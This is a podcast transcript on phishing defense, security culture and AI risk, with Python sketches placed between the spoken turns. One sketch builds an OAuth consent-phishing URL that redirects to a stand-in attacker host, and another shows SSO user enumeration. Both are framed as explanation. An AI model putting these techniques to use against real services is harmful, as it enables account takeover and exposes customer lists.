Phishing For Answers

Phishing Gone Wild: Tales from the Trenches

Joshua Crumbaugh, Founder & CEO of PhishFirewall

Kevin Walsh joins us to share his wealth of experience in cybersecurity and the crucial role of human elements in security strategy. The discussion touches on compliance, phishing simulations, and the impact of AI in the realm of cybersecurity. 

• Importance of understanding human behavior in cybersecurity 
• Compliance: Balancing act between requirements and effective security 
• The security culture: Building a proactive environment 
• Phishing simulations: Making training relevant and effective 
• AI's role in modern cybersecurity landscape 
• Vendor security: Addressing the weakest link 
• Strategies to engage all levels of staff in security practices 

Thank you for listening! If you enjoyed this episode, please consider subscribing and leaving us a review. 


Joshua Crumbaugh is a world-renowned ethical hacker and a subject matter expert in social engineering and behavioral science. As the CEO and Founder of PhishFirewall, he brings a unique perspective on cybersecurity, leveraging his deep expertise to help organizations understand and combat human-centered vulnerabilities in their security posture. His work focuses on redefining security awareness through cutting-edge AI, behavioral insights, and innovative phishing simulations.

PhishFirewall uses AI-driven micro-training and continuous, TikTok-style video content to eliminate 99% of risky clicks—zero admin effort required. Ready to see how we can fortify your team against phishing threats? Schedule a quick demo today!

Joshua Crumbaugh:

Hello and welcome to another episode of Phishing for Answers. Today we've got Kevin Walsh with us. Kevin, tell us a little bit about your background.

Kevin Walsh:

Background-wise, I got started in cybersecurity through network and system administration, before most companies actually had a formal cybersecurity group. Through that I went into infrastructure and infrastructure management, from there I specialized in security, and then I became exclusively cybersecurity.

Joshua Crumbaugh:

Okay, very good.

Kevin Walsh:

People come to cyber from different directions. Sometimes it's from GRC, sometimes it's from Red Team. For me, it was more the security engineering area.

Joshua Crumbaugh:

Yeah, no, mine was a little bit different too. I mean, I guess I started out in IT as well, but I didn't come into cybersecurity because of the security around IT. One day I was researching and came across penetration testing and said, oh, I'm going to do that. It just sounded fun, and I was bored with my current job at the time, and that's how I ended up in it: physical pen testing.

Joshua Crumbaugh:

I did actually just about every type of penetration testing in my career. Now, a lot of it was physical with social engineering, breaking in in the middle of the night, stuff like that. But when I worked for the federal government, almost that entire time was spent on their application security side of things: testing all the applications before they would be rolled out to the public, to see if there were any vulnerabilities and help them correct them.

Kevin Walsh:

Yeah, app security is another major area.

Joshua Crumbaugh:

Yeah, and there's a lot less travel with application security. In my experience, a lot of red teamers start off in the network and love it, but they'll get a little bit worn out by the travel and decide, hey, I'm going to go do application security for a while. That's what happened for me, anyway.

Kevin Walsh:

Physical pen testing is a lot of travel too, but it's often a lot of fun.

Joshua Crumbaugh:

Oh, it's a blast. I mean some of the things that I got paid to do.

Kevin Walsh:

Did you ride any elevators? Oh, all kinds.

Joshua Crumbaugh:

But I think one of my favorite stories was an NBA game where we watched the game from the operations center, you know, hanging out, high-fiving the general manager of the team. No one asked us why we were there, because we had pretexted our way in ahead of the game and said that we were backup support for the Jumbotron. No joke. We had the name of the company, we printed these little fake business cards, and we'd figured out how it worked and that it was mostly contractors, so there's a little bit more to it. But yeah, we just said, hey, we're here for the Jumbotron, and interestingly enough, it worked, and we were able to watch that game.

Joshua Crumbaugh:

But I mean, just stuff like that, getting paid to do it. It's insane. That was fun for me too. For me, though, that was also what really built the passion around the human element. If you do any physical pen testing, you're going to have a human finding on just about every single report. And when I would do that and talk to different business leaders about the human problem, they would say, well, we're already doing everything that XYZ framework tells us to do; what else are we supposed to do here? And I looked at the industry and just said, you know, we really do need to figure out a better way. It was really, I don't know, exacerbated when I tailgated in off the same guy four years in a row, and I'm like, are you kidding me? Does anyone read these reports?

Kevin Walsh:

That sounds like a little bit of checkboxing there.

Joshua Crumbaugh:

Yeah, no, I think it was definitely a little bit of checkboxing, and to me that's often the problem with compliance: because 70 or 90% of your time as a cybersecurity leader is spent around those compliance requirements, they're often looked at as the finish line instead of what they really are, the starting line. But I mean, audit and GRC... well, you tell me. You were heavily regulated, at least I imagine, with PCI, right, at the last place?

Kevin Walsh:

Yeah.

Joshua Crumbaugh:

So did it take up a lot of your time?

Kevin Walsh:

It did. When I was strictly security engineering, no, but as a CISO, yes, it does, and it's important; we shouldn't downplay it. But PCI and SOC 2 are really subsets of best practices, things we know to do already. So if you're implementing best practices, then compliance should just be checking off boxes and doing the paperwork properly. If you're implementing things because of one of these compliance tasks, then you're definitely behind best practices; those standards are at least three or four years behind what we know we should be doing already.

Joshua Crumbaugh:

Oh yeah, the frameworks and the compliance standards don't keep up. I think the best example is that I don't think any of the training requirements address AI yet. They're starting to address AI in other elements, but I haven't seen a single training requirement that says, hey, you need to train your team about AI, privacy, and the data around it.

Kevin Walsh:

I don't know what's really changed with AI, though, other than the adversary getting better. If it appears to be a person now, it appeared to be a person before, and a lot of the things I dealt with five and six years ago were early forms of AI.

Joshua Crumbaugh:

I mean, agreed there, although I think it is better now. Oh, it sure is. What I was getting at there was more on, I guess, a different side of it. But you know what, I lost my train of thought there. What changed with...

Kevin Walsh:

AI, I think, was the scale, the ability of actors to scale.

Joshua Crumbaugh:

That's where I was going. I was going to mention that with AI, the biggest thing that's changed is that everyone's using it. Before, no one was using it, and I didn't have to worry about my users uploading sensitive information or PHI or something like that into one of these systems. Now, A, if I don't give them a system, they're going to use one anyway, and B, it's just all the more risk around data privacy and things like that when it comes to AI. At least that's what I'm concerned about.

Kevin Walsh:

Right, and it's difficult to enforce policies. Although there are ways to do that: especially if you have zero trust, tight control of your clients, and a good MDM, you can start to get a handle on AI usage in your company. Otherwise, there's not much you can do. And even when you do have that handle, people, of course, are using it on their phones. This is the reality of the world, and I don't think we should be fighting that.

Joshua Crumbaugh:

Oh, I agree. I think that's why we need to embrace it, give them ways to use it safely, because, you're right, if we do fight it, then they're on their phones doing it anyway. So better to give them a way to utilize those tools in a safe and secure manner.

Kevin Walsh:

Right, that's the key: you give it to them in a way that is very beneficial to them. Getting an enterprise account for them is very beneficial. Here it is, go ahead and use it, and then you can monitor it if you want.

Joshua Crumbaugh:

Yeah, oh, absolutely. But more importantly, with an enterprise account, your data is not being fed back into the model to train it, whereas with almost every personal account, your data is being fed back into the models to train it.

Kevin Walsh:

And you have to trust the company, that they're not training off of it too.

Joshua Crumbaugh:

Well, you have to trust any of them, and I mean, in that regard, I don't trust any of them.

Kevin Walsh:

Well, in cyber, I would say, don't put anything into any public AI. You should be using only private AI.

Joshua Crumbaugh:

I agree, and that's sort of my point. I'm not saying any of these companies are ignoring the requirements or what they say, but we've seen so many times where these massive tech companies have said one thing and then got caught doing another. And that's my concern, because the more data they have, the better, and when we live in a day and age of data, I feel like there's a lot of temptation to just include other data in there.

Kevin Walsh:

Yeah, having it make sense of your spreadsheets and your pivot tables for you is certainly highly productive, but you need to give people a private one or an enterprise one to do that.

Joshua Crumbaugh:

Yeah, no, I agree.

Kevin Walsh:

That's incumbent on getting your management to do that and your infrastructure people to enable that.

Joshua Crumbaugh:

Well, you know, one of the concerns that I've had around that specific thing: okay, so let's say we create a corporate AI. How do we now apply role-based access controls? Because if I put enough data in it to make it helpful for multiple departments, there's certainly a need to restrict some bit of data from one person and give it to another person. So that's one of the things I've been wondering about: how do we apply those within a large language model?
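One pattern that can approximate this today, sketched here with entirely hypothetical names and data, is to enforce permissions outside the model rather than inside it: tag each document with the roles allowed to see it, and filter at retrieval time so restricted data never enters the prompt at all.

```python
# Hedged sketch: role-based filtering AROUND an LLM, not inside it.
# Documents carry role tags; only documents the requesting user's
# roles can access are assembled into the prompt context.
from dataclasses import dataclass

@dataclass
class Document:
    text: str
    allowed_roles: set  # roles permitted to see this document

def build_context(docs, user_roles):
    """Return prompt context containing only documents the user may see."""
    visible = [d.text for d in docs if d.allowed_roles & user_roles]
    return "\n---\n".join(visible)

docs = [
    Document("Q3 payroll summary", {"finance", "hr"}),
    Document("Public product FAQ", {"everyone"}),
]
# A support agent never gets payroll data into the prompt:
print(build_context(docs, {"everyone", "support"}))  # Public product FAQ
```

The point of the sketch is the shape of the control: access decisions happen in ordinary code before the model sees anything, which is exactly the "controls around the large language model" idea discussed below.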

Kevin Walsh:

Yeah, I've never done a private deployment that large. In the last couple gigs I've had, we've done it really just for the cyber team, in a shared model.

Joshua Crumbaugh:

Okay.

Kevin Walsh:

And we went ahead and got enterprise AI for the larger organization, for the different departments.

Joshua Crumbaugh:

So were they using it as, like, a blue team assistant? Or how was the cyber team using it?

Kevin Walsh:

Really, just to do paperwork as well. I mean, any of our work like that; it's not like we don't have paperwork to do. And it can make short work of a lot of things, especially reports, KPIs, OKRs, and things like that. So it's a good productivity booster no matter how you look at it; it just has to be used safely.

Joshua Crumbaugh:

Agreed, and there are a lot of ways to do that. We're seeing more and more really intelligent models that can be deployed locally on your machine, and I'm really excited. Like last week, we saw that one model that was trained at one-eleventh of the cost of all these other models; it's really small, but it's scoring up there with GPT-4o. Things like that, I think, are how we solve the privacy concerns, with more edge AI. And I'm sure someday somebody will figure out how to do role-based access controls inside a large language model, but until then, I imagine we'll probably put controls around the large language model.

Kevin Walsh:

So at CES, NVIDIA gave an excellent presentation where they showed AI-enabled, very powerful boxes powered by their chips that were $3,000 one-off. That could easily...

Joshua Crumbaugh:

Yeah, I was just commenting on Facebook this morning, when one of my friends posted it there, and I was just thinking, wow, a supercomputer on my desktop for $3,000.

Kevin Walsh:

Or just a big NVIDIA card inside a server or a desktop. Particularly servers, if you have a private cloud, are a great way to go, especially if you want to do anything with images. That becomes very expensive and very compute-intensive, but being able to scan images and have the AI interpret images is a big benefit, and it's a big leap from being just text-based. So that really requires some horsepower, and it looks like NVIDIA is stepping up. As an early investor in NVIDIA, I'm very happy about that.

Joshua Crumbaugh:

I mean, hey, when there's a gold rush, sell shovels. And well, NVIDIA is selling shovels, aren't they?

Kevin Walsh:

I thought I was investing in them for their gaming ability. I had no idea back in 2003 that AI was going to come along.

Joshua Crumbaugh:

Yeah, yeah. No, that's a phenomenal investment. I'm sure it's done really well for you.

Kevin Walsh:

I never look at it.

Joshua Crumbaugh:

It's ridiculous, so they're doing really well. Yeah, so, shifting subjects just a little bit off of AI, what's your opinion on culture? And when I say that, I like to start with just a simple question: if you had to pick one, which would it be, carrot or stick? And then we'll dive into more of how we build culture and different things like that, but I like to start with that question.

Kevin Walsh:

It's always carrot. Stick is in the background, and at any professional company with high-level professionalism, the stick should be in the background and the carrot should be in the foreground, always. Everyone knows the stick is there. You're there to do your work and to do it right, and to follow policies and company guidelines, so you shouldn't have to question whether the stick is there. But the carrot's really what's going to move things forward. So I'm definitely for carrot.

Joshua Crumbaugh:

I'm a big team-carrot guy myself. So no, I agree with you that we've got to lead with kindness, and to me, it's about creating the culture that we want. I can't force it down your throat to just make you more security aware; that's never going to work, beating you to make that happen. I have to make you care, and in order to make people care, to me, we have to lead with empathy. We have to start with why. There are just a few things like that that really help to change that behavior.

Kevin Walsh:

Well, if you're a CISO, you're preaching to the choir. Your team is already very security aware and very pro security. It's a matter of how do you get that company that you're in to change, and that usually starts with the company leadership. There's no two ways about that. If the leadership is on board with security and willing to make an investment in it, then you've got the wind at your back, that's for sure. And when you're talking about changing a company's culture or affecting it, you're usually affecting leadership, because it is certainly top-down.

Joshua Crumbaugh:

Oh, 100%, every bit of it. All of the best security awareness programs I've ever seen start at the highest level of the C-suite. I can even tell with clients when they kick off: if the CISO sends the announcement to the whole company, it's never going to be as effective as if the CEO sends the-

Kevin Walsh:

Everyone's aligning themselves with the company and where it wants to go, with that executive team. If they're talking about security, if they're doing it themselves as an example, which is excellent, and certainly not being a counterexample, then you know you can start implementing your programs and start doing good work.

Joshua Crumbaugh:

I agree, and that is, to me, where culture typically does go wrong. But outside of getting the C-suite buy-in, what are some tips that you might have on building a positive security awareness culture?

Kevin Walsh:

Definitely don't be punitive. Sometimes I've entered into a company where there were punishments for people when they failed phishing tests and things like that. We should never be punitive in that way; that's why I'm really more pro-carrot. We don't want people to have a security issue and then not report it. We want them to report it with alacrity. So we want to be clear that anyone can be fooled, especially in the age of AI; now it's much easier to communicate that. And see something, say something should always be one of the guidelines of the security group, and there should be no penalty for talking about security issues. It should be confidential, always, of course, but we should encourage people to speak up and to not be afraid to do so. Having a culture of maybe even reward for that definitely helps out and helps get people on board.

Kevin Walsh:

Going back to getting the C-suite on board, though, what I've noticed lately is that every company has partnerships: sometimes it's subcontractors, sometimes it's peer partners. People are finding that the supply chain is a major vulnerability now.

Kevin Walsh:

It's not just how tight your company is, it's how tight your partners are, how tight your suppliers are, the people you're actually doing business with. So more and more now, we're finding that partners and contractors are pushing companies into getting their security in line. In other words: we don't want to do secure email with you unless you've already got your email set up to a certain standard. And you know, I thought we were going to mostly talk about phishing on the podcast, but wherever you want to go. In setting up email, in many cases you want to divide the trusted sources from the non-trusted sources, and those trusted sources have to meet certain standards, and sometimes you get pushed. Earlier in my career, some major contractors like Disney and Google were pushing some of the smaller firms I was working with into getting their security in line so that they could win contracts with them. That easily gets the ownership on board with getting security together, and not just in a checkmark fashion.

Joshua Crumbaugh:

Oh yeah, I mean, I've got stricter requirements from my clients than I ever do from compliance requirements, and it's funny, when I look at the requirements that some of my clients have, they're stricter, and they ask questions that these frameworks often don't ask. So no, I definitely think that's an area that will help people a lot. And yes, I do love to talk about phishing, so along those lines, what's your approach to phishing within the enterprise?

Kevin Walsh:

Phishing prevention. Well, I think it starts with getting your email and messaging set up, and let's face it, it's not just email anymore, it's various forms of messaging. In some cases we should be leading the Googles and Yahoos of the world, but you know, they're at DMARC p=reject now, and frankly everybody should be. I think it's still a minority of Fortune 1000 companies that are at DMARC p=reject, and I think that's sort of a minimum now: we should only accept properly formatted email from proper servers. We just have to get our game together here and set that up first. Then getting your secure email gateway, partnering with a vendor, because let's face it, we don't make this stuff ourselves; it's always a partner we have to go with, the Mimecasts, the Proofpoints, the Symantecs, the Ciscos of the world, and implementing that properly. And then training, of course, getting users trained, because plenty of these remote access programs, these RATs, get through most of our secure gateways. Frankly, they're designed to get through them, through a number of techniques: encryption, encryption after the link, before the link. So we do have to have our training in place there.
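For context on what "DMARC equals reject" means mechanically: the policy is published as a DNS TXT record at `_dmarc.<your-domain>`. A minimal sketch of parsing one and checking the policy tag; the record string below is a made-up example, not any real domain's policy.

```python
# Sketch: parse a DMARC TXT record into tag=value pairs and check
# whether the policy is p=reject. The example record is hypothetical.
def parse_dmarc(record):
    """Split a record like 'v=DMARC1; p=reject; ...' into a dict."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            key, _, value = part.partition("=")
            tags[key.strip()] = value.strip()
    return tags

record = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; pct=100"
policy = parse_dmarc(record)
print(policy["p"])  # reject
```

A real check would query DNS for the TXT record rather than use a literal string; `p=none` or `p=quarantine` in that tag is what distinguishes a monitoring-only deployment from the reject posture described above.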

Kevin Walsh:

And one of the things I've always thought, and I want to know what you think about this, is that to some degree, the email system inside a company is now a system of record. It's like memos used to be. I don't know if you've ever been in a company that had actual memos that got passed around. Some of the places I interned at had memos, which were inside these packets with multiple signatures on them.

Kevin Walsh:

"Did you get the memo" is almost just a phrase now, and no one knows where it came from. So there was an internal communication system of record, and when email came along, nobody thought about it, nobody designed it or planned it, but the internal system of record became coupled to a completely open outside system as well, which is where the real heart of the issue is. Our internal record system, as we talk to one another inside a company, is attached to basically the same thing as a junk mail system, the postal system, where anybody can send anybody anything. I don't think, if we were to set it up deliberately, we would ever design it that way, and we should start thinking a little more about whether every employee needs an address where they can receive email from anyone.

Joshua Crumbaugh:

Well, you know, I would say we have things like Teams, but most companies I look at still allow phishing into their Teams. It's a simple configuration setting, but more often than not, when I look, that setting has not been changed, and so you can phish directly to somebody's Teams account. But I do think that's a very accurate observation, and certainly part of the reason that we're vulnerable. And it's not just the company; email made it to where that threat existed in our living rooms, in our houses.

Kevin Walsh:

Email has reshaped how the scammers and the con artists and the general bad guys and the nation-states get at us and how they're able to target us. Well, they can, because they have a direct way into every person at most companies, anyway, which is something you wouldn't set up if you had a choice to do so. That's kind of the heart of where this came from. And, of course, the bad guys are just going to pick the weakest spot.

Joshua Crumbaugh:

Every single time. They'll pick another spot, by the way. Oh, 100%, and the bad guys are always going for your weakest link, the low-hanging fruit in general. I get that it's an engineering issue, but we do have things to help deal with that. We have the external sender notification, and that needs to be something that employees really understand well enough to pay attention to it, and I know that a lot of employees ignore it because they don't understand why it's so critical.
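The external sender notification mentioned here is typically a gateway or tenant rule. As a conceptual sketch only (the function and domain list are hypothetical, not any product's API), the underlying logic amounts to tagging any message whose sender domain isn't one of the organization's own:

```python
# Conceptual sketch of external-sender tagging; the domains and the
# [EXTERNAL] tag format are assumptions for illustration.
INTERNAL_DOMAINS = {"example.com", "corp.example.com"}

def tag_external(subject, sender):
    """Prepend an [EXTERNAL] tag when the sender's domain isn't internal."""
    domain = sender.rsplit("@", 1)[-1].lower()
    if domain in INTERNAL_DOMAINS or subject.startswith("[EXTERNAL]"):
        return subject  # internal mail, or already tagged, passes through
    return "[EXTERNAL] " + subject

print(tag_external("Invoice attached", "billing@vendor.net"))  # [EXTERNAL] Invoice attached
print(tag_external("Team lunch", "alice@example.com"))         # Team lunch
```

The already-tagged check matters in practice: without it, a reply chain that crosses the boundary twice would stack tags, which is one of the ways these banners become the "numbing" noise described next.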

Kevin Walsh:

It becomes numbing; that's what we do. So we have a default-open system, and I wonder if we should change it at some point to default closed.

Joshua Crumbaugh:

I can't imagine the volume of workload that would hit the help desk day one if you did that, though.

Kevin Walsh:

Well, it would be less phishing. But it would depend on the type of company. If you're a defense contractor, do your engineers need to get external mail? They don't, if they're not interfacing with anything but specific partners.

Joshua Crumbaugh:

I don't know that that solves the problem, though, because when I look at the phish that are getting through the filters, nine out of ten of them are coming from a compromised server or a business email compromise, at least from what I'm seeing. So all of those are still going to sail right through, because they're already coming from a trusted server. And that goes to the vendor issue you were talking about earlier, and how we're only as strong as our weakest link. I'll tell you, for most of the companies I know that are really secure on their side, if they do have a phishing incident that even gets remotely close to being anything, it's because a vendor got compromised and they trusted that vendor.

Joshua Crumbaugh:

That's right, and that is, I think, one of those areas that our general staff often don't realize as much as they need to: you are going to be targeted, and, more importantly, your vendors will get compromised. It's not a matter of if, but when and who. And when they do get compromised, they're going to try to change a little detail here, a little detail there, to reroute some money. To me, it's largely a matter of making sure the right people in our organizations know about all the different scams that they're going to face, and when we get better awareness, we have less of a threat, because they're less likely to fall for it. But to me, that's why we run phishing simulations. So let's talk about phishing simulations. What are your thoughts on them, and what's your approach?

Kevin Walsh:

I like them to be as realistic as possible, though without naming any names, we've gotten in some trouble over that. In one case, we sent out some mails that were quite realistic, really to induce people to click, of course, and one of them said there had been some mistake in your paycheck. That one usually works very well, or anything having to do with their employment. We sent it to a UK subsidiary, though, and they claimed that it had traumatized several hundred of their employees. It was a very successful phishing test.

Joshua Crumbaugh:

I mean, I just looked at it as, this was a good one, but they did not look at it that way. No, I think that's an issue, actually. That's a question I often ask on this podcast: have you ever had anyone get upset as a result of a phish?

Kevin Walsh:

Yeah, we've had some of those, and in some cases they weren't vetted outside of the training group. Maybe something like that would have been caught, and we could have given a heads-up to HR; that would have worked out a lot better. But in some cases, you know, the bad guys aren't going to have any compunction about doing such things. So we really do have to do phishing simulations that are as realistic as possible, especially if we're going to accept mail from any source.

Joshua Crumbaugh:

Yeah, I have a few thoughts there. Number one, I've had the same thing happen. Well, I've got a million stories, because I've sent a lot.

Joshua Crumbaugh:

Close to a hundred million phish in my career. So I've got stories of upsetting people as a result. But what I realized was that I don't ever want to upset somebody. That's not why I'm there; that's not why I'm phishing them. I'm phishing them because if I can show them how urgency is used against them, then they might learn about urgency. And if they learn about urgency really well, they're going to start to notice it on a subconscious level, and it'll just be a red flag that'll help them move on.

Kevin Walsh:

And so if you get an emotional charge or hit out of the email, that should be the first thing that prompts you to question it.

Joshua Crumbaugh:

Oh, agreed, and so I'm training them on these different tactics; that's why I phish them, and I don't ever want to get them upset. And I think this is where gamification really works well. I say that because what I realized was that we can tell users we're going to phish them ahead of time: say, hey, let me tell you about a phish that pretends to be from your payroll department, and now be on the lookout, because the next time you see it, it might be us, or it could be the real bad guys trying to target you. You can even highlight how it's based on a real email that targeted somebody from their organization. To me that's a better approach, because now, if they click, you already warned them; they're not upset; you de-weaponized it; and, more importantly, you've made a game out of it. So I think there are ways we can change our strategy around phishing to make it less invasive for the users, or maybe invasive isn't the right word. Less, I don't know, angering.

Kevin Walsh:

If you have a phishing program, I think they do feel proud when they find the phish. So gamification has been going on for quite a while now, and it really is productive. People just really love to find the phishing emails. I remember setting it up to train them to find at least five different things inside an email. With AI now, we're not going to have a lot of spelling errors, unfortunately. I mean, that was it.

Joshua Crumbaugh:

No, I mean, that's done. In fact, I would argue that spelling errors now indicate that it's not a phish. It's the opposite.

Kevin Walsh:

So we have to change our training, of course. But yeah, gamification, I would agree with that.

Joshua Crumbaugh:

It makes it fun, it makes it interesting, and it gives us an opportunity to praise the user when they do something right.

Kevin Walsh:

Yeah, it's participatory, so you're part of it. You should make security something that somebody is happy to be a part of, being a member of the team. I think that's the most rewarding thing for any employee, to feel like they're contributing, being part of a team. Just make sure they're all members of your team and not fighting your team. Definitely.

Joshua Crumbaugh:

Yeah, no. And I think we need to be the department of yes-but, right? Can we do this? Yes, but let's put some guardrails around it and make it a little bit more secure. Versus the department of no. It's so easy to become the department of no, where we can't do that and we can't do that, and that doesn't make us many friends. And if we're going to find all of the vulnerabilities that exist within the human layer alone, that requires conversations, because your audit isn't going to find out about that insecure practice your accounts payable team has, or whatever it might be. So I think there's a social aspect to cybersecurity leadership in general, just to be able to fully understand all of your vulnerabilities.

Kevin Walsh:

Oh, and another critical thing is to have all of your backup security set up there too, because eventually people are going to fail. So you're going to have to have your EDR, and you're going to have to have your multi-factor set up, because usually they're looking for credentials when it comes right down to it. Especially physical multi-factor; multi-factor coming through email is getting to be a little weak. We should probably be using more and more biometrics and physical devices, and perhaps passkeys. People are looking for more and more solutions.

Joshua Crumbaugh:

I'd like to see more people accept and support passkeys myself.

Kevin Walsh:

Yeah, this recent issue with PowerSchool has affected me personally. I've got two kids in elementary school.

Joshua Crumbaugh:

Oh no. Tell me about it.

Kevin Walsh:

PowerSchool is a system used, I think, all the way up K through 12 in the US. It has the grades and lets the parents see the grades, teacher comments and also things more private. Of course, the kids' grades are very private; anything about a child, a minor, is private. But it can have other things, like trouble that child's having, special education, things like that.

Kevin Walsh:

They had a major breach last week, and we all got notifications. It seems as though they compromised a customer service rep. Of course, as is typical, we don't know a whole lot about it because they haven't said a lot. They just reported it, as they're required to do, but it looks like phishing and some credentials of a customer service rep who went in to service the system when it was having issues. So this is a person with privileged access. In most of the setups I've done, you're not able to do that; multi-factor should prevent some of this, and privileged access management should prevent a lot of this, but somehow they made it through those other layers.

Joshua Crumbaugh:

Yeah, I will say, one of the ways that I see them getting around multi-factor more often than anything else is through consent phishing. And to me that's one of the worst attacks lately, because more often than not, when somebody's like, well, how'd they get in, that's where it is: somebody just said "authorize application," because they're so used to clicking through those Google and Microsoft authentication screens.
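As a rough illustration of why consent phishing sidesteps multi-factor: the lure links to the identity provider's real OAuth 2.0 authorize endpoint (Microsoft's v2.0 endpoint is shown here), but the requesting app is attacker-controlled. The client ID, redirect URI, and scope set below are invented for this sketch; the victim is already signed in, so the only prompt they see is the consent screen.

```python
from urllib.parse import urlencode

# Hypothetical attacker-registered app ID and callback; both are made up.
ATTACKER_CLIENT_ID = "d3adbeef-0000-0000-0000-000000000000"
ATTACKER_REDIRECT = "https://attacker.example/callback"

def consent_phish_url(client_id: str, redirect_uri: str) -> str:
    """Build the kind of OAuth consent URL a consent-phishing lure links to.

    The page it opens is the provider's legitimate login/consent screen; only
    the requesting application is malicious. MFA never fires because the
    victim is already authenticated and is merely granting the app access.
    """
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        # Broad delegated scopes: read mail/files and keep long-lived access.
        "scope": "offline_access Mail.Read Files.Read.All",
    }
    return ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize?"
            + urlencode(params))

url = consent_phish_url(ATTACKER_CLIENT_ID, ATTACKER_REDIRECT)
```

The defensive counterpart is administrative: restrict which apps users may consent to, and review existing OAuth grants for over-broad scopes.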

Kevin Walsh:

We'll find out eventually, I think, probably a little more about the PowerSchool hack.

Joshua Crumbaugh:

Be interesting.

Kevin Walsh:

Yeah, but having multiple layers of defense behind that front line is always going to be critical.

Joshua Crumbaugh:

Yeah, I think those defenses should even take into account who your chronic clickers are, or whatever we want to call them. And that's where, if we're running the program right, we're going to isolate those users that click on everything. Maybe they're in sales; they're going to be in a more secure network, and they're going to have less access in your PAM solution.

Kevin Walsh:

All these things make sure that, even if they do click, it doesn't matter, right. And people working in cyber and infrastructure with privileged access need to be much, much tighter than the other groups. Oh yeah, I don't want to see one of my own team members showing up in the phishing reports, for sure. Right, and there shouldn't be a lot of external email going back and forth.

Kevin Walsh:

A lot of these teams are mostly internal, although of course you do have to work with vendors. Like I said, we're partnering with vendors for security all the time. But nevertheless, those should have the tightest controls, and your salespeople aren't going to have as many controls. They're out there; in some cases they're the front line of a company.

Joshua Crumbaugh:

They're the frontline soldiers of a company, but they're going to have less access. They need access to your Salesforce and maybe a few marketing tools, that's right, so they don't need nearly the level of access as other people. So if they get caught, what's your competitor going to get? Some marketing materials?

Kevin Walsh:

Well, that's true, but you have to be careful that they don't have access to sales data. They need to protect that in particular. Oh yeah.

Joshua Crumbaugh:

Customer lists and things like that are costly, right? You know what I found interesting when I was in application security, or rather when I later founded a SaaS company, because when I was in application security I hadn't really thought about it. We would do all of these different tests against these SaaS companies and, more often than not, their SSO would give away their entire client list. When you typed in an email address, it would basically give you three or four different responses. One response would say, hey, this email address exists in our system. Another would say this domain exists in our system, but the email address doesn't.

Joshua Crumbaugh:

And another one would say, you know, this domain exists and their SSO is set up, and give you a redirect URL. So you could go into almost any one of these companies (it's starting to get better now), you could go into most SaaS companies, and you could enumerate their users. And it was when I became a founder and a CEO that I realized, wow, that's really valuable data, and we were putting it in most reports as a low-severity information disclosure. A client list is not a low; that's a critical finding for any SaaS company. So I think there are certain things that you don't necessarily see when you're more junior in those roles that you see as you get more and more senior, and I don't know if there's a good way to solve that, but it's always an interesting observation for sure.
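The enumeration flaw Joshua describes can be sketched in a few lines: a leaky login lookup that answers differently per case lets an attacker probe a SaaS sign-in page and reconstruct the client list, while the safe version answers uniformly. All names, domains, and response strings here are illustrative.

```python
# Sketch of SSO user enumeration. An endpoint whose responses differ by
# whether the email or its domain is known leaks the customer list.
REGISTERED_USERS = {"alice@acme.example"}
SSO_DOMAINS = {"acme.example"}

def leaky_lookup(email: str) -> str:
    """Vulnerable behavior: three distinguishable responses."""
    domain = email.split("@")[-1]
    if email in REGISTERED_USERS:
        return "user exists"
    if domain in SSO_DOMAINS:
        return "domain exists, redirecting to SSO"
    return "unknown user"

def safe_lookup(email: str) -> str:
    """Fixed behavior: identical response whether or not the account exists."""
    return "if this account exists, a sign-in link has been emailed"
```

An attacker only needs the leaky version and a list of candidate domains to confirm which companies are customers, which is why this is a critical finding rather than a low.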

Kevin Walsh:

It is interesting. What do you think about obscuring easily guessable email addresses, especially for leadership?

Joshua Crumbaugh:

Oh, I absolutely think that you should, and I think the easily guessable ones should really be used as honeypots.

Kevin Walsh:

That was exactly what I did two gigs ago. I made those honeypots and said, listen, if you're going to be in leadership in this company, I don't want you to have an email address that's easy to guess.
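The honeypot approach Kevin describes can be sketched simply: the old, guessable leadership addresses stay alive as decoys, and any mail arriving at them is flagged as likely phishing reconnaissance. The addresses below are made up for illustration.

```python
# Decoy addresses: guessable executive aliases that no one legitimately
# uses anymore. Mail to them is a strong phishing signal.
HONEYPOT_ADDRESSES = {
    "ceo@example.com",
    "cfo@example.com",
    "jsmith@example.com",
}

def is_recon(recipients: list[str]) -> bool:
    """Return True if any recipient of a message is a honeypot address."""
    return any(r.strip().lower() in HONEYPOT_ADDRESSES for r in recipients)
```

A mail gateway rule built on this check could quarantine the message and alert the security team, giving early warning that executives are being targeted.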

Joshua Crumbaugh:

Yeah, so it has to be obscure, something no one would ever think of, mainly because our executives were getting hit so hard. Oh yeah, I look at how I get hit every single day, and I can only imagine the bigger your company, the worse it gets, especially in finance, right? I mean, we could have a new intern start and I will get a phish about that intern within minutes, so I've got to imagine it's the same for pretty much any company out there. I think the problem is only going to get worse with AI. I saw a study that said Amazon had seen a 700% increase in attacks last year, and it wouldn't surprise me, but there's only one thing that would explain a 700% increase in attacks in 2024, and that's AI.

Kevin Walsh:

Right yeah.

Joshua Crumbaugh:

Yeah, I would attribute it to that too. The other thing that I'm worried about, I guess a little bit, is that novice hacker that we didn't have to worry about before. They're not terrible, they're not great, they're right in the middle, and now they have these tools that can make them as good as an elite hacker, just like that.

Kevin Walsh:

Is that any different than before, though? We've always had the script kiddies. We've always had them.

Joshua Crumbaugh:

Ah, but the script kiddie now knows how to run all the tools, if they know how to ask the right questions.

Joshua Crumbaugh:

So what I think is, it levels them up. There's this tool called Open Interpreter, and I put it into Kali Linux and did some penetration testing on a lab network. I said, okay, go and do this. And it didn't do it that well, but it did it. Then I said, okay, now let's combine my knowledge with its knowledge: use this tool and go and do this. And it actually used flags on the tool that I had never even used, or rarely used, and it was just impressive how well it was able to use the tool. So that, to me, is where it gets dangerous: when you take somebody that knows a little and you give them access to a tool that can act as a force multiplier for the little bit of knowledge that they do have.

Kevin Walsh:

That's right. It's the same issue as before, it's just greater.

Joshua Crumbaugh:

Yeah, exactly. It's just a force multiplier for the bad guys, unfortunately.

Kevin Walsh:

It is quite remarkable what an AI will do when given a tool, though. In other words, you realize you thought you were an expert in a tool, but you were not.

Joshua Crumbaugh:

Oh yeah.

Kevin Walsh:

Once you have an agentic AI, it's going to use things in new and interesting combinations that you hadn't even thought of before. No one had thought of them, because it doesn't have the preconceived notions that we do about how this ought to work. So yeah, that's an issue coming up. There's certainly plenty of work for us ahead, let's put it that way.

Joshua Crumbaugh:

